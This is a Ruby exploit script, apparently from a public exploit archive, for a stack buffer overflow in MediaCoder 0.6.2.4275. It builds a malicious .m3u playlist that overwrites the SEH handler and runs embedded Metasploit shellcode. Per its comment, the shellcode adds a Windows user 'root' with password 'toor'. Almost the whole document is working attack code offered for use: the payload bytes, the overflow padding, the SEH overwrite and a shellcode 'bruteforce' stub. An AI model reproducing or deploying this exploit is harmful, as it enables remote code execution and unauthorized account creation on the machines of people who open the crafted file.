MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH)

#!/usr/bin/env ruby # MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH) # Universal SEH Overwrite Exploit # By Stack # Mountassif Moad # Download app : http://mediacoder.sourceforge.net/mirrors.htm?file=MediaCoder-0.6.2.4275.exe # cat Greatz.txt # Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z # Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & welahima b9ite 3arefe chkoune akhore rani tansa :d # ahe nsite big thnx to Str0ke and thanks you for all patience and your advice & support time3 = Time.new puts "Exploit Started in Current Time :" + time3.inspect puts "Enter Name For your File Like : Stack" files = gets.chomp.capitalize puts "Name Of File : " + files +'.m3u' time1 = Time.new $VERBOSE=nil Header = "\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46"+ "\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F"+ "\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20"+ "\x0D\x0A\x44\x3A\x5C" # win32_adduser - PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com Shellscode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+ "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+ "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+ "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+ "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"+ "\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x38\x4e\x47"+ "\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"+ "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x58"+ "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"+ "\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+ "\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x57\x45\x4e\x4b\x48"+ "\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"+ "\x4b\x48\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x48\x4e\x41\x4b\x58"+ "\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53"+ "\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x57"+ "\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"+ "\x4b\x38\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"+ "\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x35\x41\x53"+ "\x48\x4f\x42\x46\x48\x55\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x37"+ "\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x36\x4a\x39"+ "\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x4d\x46"+ "\x46\x56\x50\x52\x45\x36\x4a\x47\x45\x46\x42\x52\x4f\x32\x43\x46"+ "\x42\x52\x50\x56\x45\x56\x46\x37\x42\x52\x45\x57\x43\x57\x45\x46"+ "\x44\x37\x42\x32\x44\x47\x4f\x46\x4f\x56\x46\x37\x42\x32\x46\x37"+ "\x4f\x36\x4f\x56\x44\x57\x42\x52\x4f\x42\x41\x44\x46\x54\x46\x34"+ "\x42\x52\x48\x52\x48\x52\x42\x32\x50\x56\x45\x36\x46\x37\x42\x52"+ "\x4e\x36\x4f\x46\x43\x56\x41\x56\x4e\x36\x47\x36\x44\x57\x4f\x36"+ "\x45\x57\x42\x47\x42\x52\x41\x34\x46\x46\x4d\x36\x49\x46\x50\x56"+ "\x49\x36\x43\x47\x46\x47\x44\x37\x41\x36\x46\x57\x4f\x56\x44\x57"+ "\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x46\x46\x47\x42\x32\x4f\x32"+ "\x41\x54\x46\x54\x46\x54\x42\x50\x5a" # Media_bruteforcer_shellcode Bruteforce = # BruteForce the shellcode to runing if it dont work in the first methode "\xD0\x62\x43"+ # SHL BYTE PTR DS:[EDX+43],1 "\x00\xB8\x6D"+ # ADD BYTE PTR DS:[EAX+1ABBB6D],BH "\xBB\xAB\x01"+ "\x00\x00"+ # ADD BYTE PTR DS:[EAX],AL "\x00\xF0"+ # ADD AL,DH "\xFF\x13"+ # CALL DWORD PTR DS:[EBX] "\x00\x4F\x6D"+ # ADD BYTE PTR DS:[EDI+6D],CL "\x81\x7C\x38\x07"+ # CMP DWORD PTR DS:[EAX+EDI+7],FFFF7C92 "\x92\x7C\xFF"+ "\xFF\xFF" + Shellscode Rhunter = "\x5B"+ #POP EBX "\x90" * 10 + # NOP x 10 "\x90\x90"+ # NOP NOP "\x8D\x44\xC1\x04"+ # LEA EAX,DWORD PTR DS:[ECX+EAX*8+4] "\x8B\x1E"+ # MOV EBX,DWORD PTR DS:[ESI] "\x89\x18"+ # MOV DWORD PTR DS:[EAX],EBX "\x89\x06"+ # MOV DWORD PTR DS:[ESI],EAX "\x42"+ # INC EDX "\x83\xFA\x64"+ # CMP EDX,64 "\x75\xEC"+ # JNZ SHORT dsp_chmx.0169127E "\x8B\x06"+ # MOV EAX,DWORD PTR DS:[ESI] "\x8B\x10"+ # MOV EDX,DWORD PTR DS:[EAX] "\x89\x16"+ # MOV DWORD PTR DS:[ESI],EDX "\x5E"+ # POP ESI "\x5B"+ # POP EBX "\x93\x43"+ # CALL ESP "\x92\x7c" Over = "\x41" * 195 + "\xff\xff\xff\xff" + "\x47" * 4 + "\x42" * 6 + "\xff\xff\x47\x47\x47\xFF\x65\x78\x77\x76" Nop = "\x90" * 8 Next_Seh = "\xeb\x06\xff\xff" Seh = "\x93\xB6\x98\x7C" Nopsled = "\x90" * 7 Xpl = Header + Over + Rhunter + Nop + Shellscode + Nopsled + Next_Seh + Seh + Nop + Bruteforce + Nopsled File.open( files+".m3u", "w" ) do |the_file| the_file.puts(Xpl) puts "Exploit finished in Current Time :" + time1.inspect puts "Now Open " + files +".m3u :d" end